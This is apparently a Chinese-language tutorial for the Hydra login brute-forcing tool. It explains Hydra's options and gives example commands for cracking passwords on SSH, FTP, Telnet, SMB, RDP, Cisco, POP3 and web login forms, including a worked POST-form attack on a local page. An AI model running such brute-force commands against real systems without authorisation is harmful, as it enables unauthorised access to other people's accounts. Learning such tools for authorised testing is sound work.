這個也是backtrack下面很受歡迎的一個工具
參數詳解:
-R 根據上一次進度繼續破解
-S 使用SSL協議連接
-s 指定端口
-l 指定用戶名
-L 指定用戶名字典(文件)
-p 指定密碼破解
-P 指定密碼字典(文件)
-e 空密碼探測和指定用戶密碼探測(ns)
-C 用戶名可以用:分割(username:password)可以代替-l username -p password
-o 輸出文件
-t 指定多線程數量,默認為16個線程
-vV 顯示詳細過程
server 目標IP
service 指定服務名(telnet ftp pop3 mssql mysql ssh ssh2......)
使用案例:
使用hydra破解ssh的密碼
1
|
hydra -L
users
.txt -P password.txt -vV -o
ssh
.log -e ns IP
ssh
|
破解https:
1
|
# hydra -m /index.php -l username -P pass.txt IP https
|
破解teamspeak:
1
|
# hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
|
破解cisco:
1
2
|
# hydra -P pass.txt IP cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
|
破解smb:
1
|
# hydra -l administrator -P pass.txt IP smb
|
破解pop3:
1
|
# hydra -l muts -P pass.txt my.pop3.mail pop3
|
破解rdp:
1
|
# hydra IP rdp -l administrator -P pass.txt -V
|
破解http-proxy:
1
|
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
|
破解telnet
1
|
# hydra IP telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V
|
破解ftp:
1
2
|
# hydra IP ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
# hydra IP ftp -l 用戶名 -P 密碼字典 -e ns -vV
|
get方式提交,破解web登錄:
1
2
|
# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns IP http-get /admin/
# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f IP http-get /admin/index.php
|
post方式提交,破解web登錄:
該軟件的強大之處就在於支持多種協議的破解,同樣也支持對於web用戶界面的登錄破解,get方式提交的表單比較簡單,這里通過post方式提交密碼破解提供思路。該工具有一個不好的地方就是,如果目標網站登錄時候需要驗證碼就無法破解了。帶參數破解如下:
1
2
3
4
5
|
<form action=
"index.php"
method=
"POST"
>
<input
type
=
"text"
name=
"name"
/><BR><br>
<input
type
=
"password"
name=
"pwd"
/><br><br>
<input
type
=
"submit"
name=
"sub"
value=
"提交"
>
<
/form
>
|
假設有以上一個密碼登錄表單,我們執行命令:
1
|
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”
|
說明:破解的用戶名是admin,密碼字典是pass.lst,破解結果保存在ok.lst,-t 是同時線程數為1,-f 是當破解了一個密碼就停止,ip 是本地,就是目標ip,http-post-form表示破解是采用http 的post 方式提交的表單密碼破解。
后面參數是網頁中對應的表單字段的name 屬性,后面<title>中的內容是表示錯誤猜解的返回信息提示,可以自定義。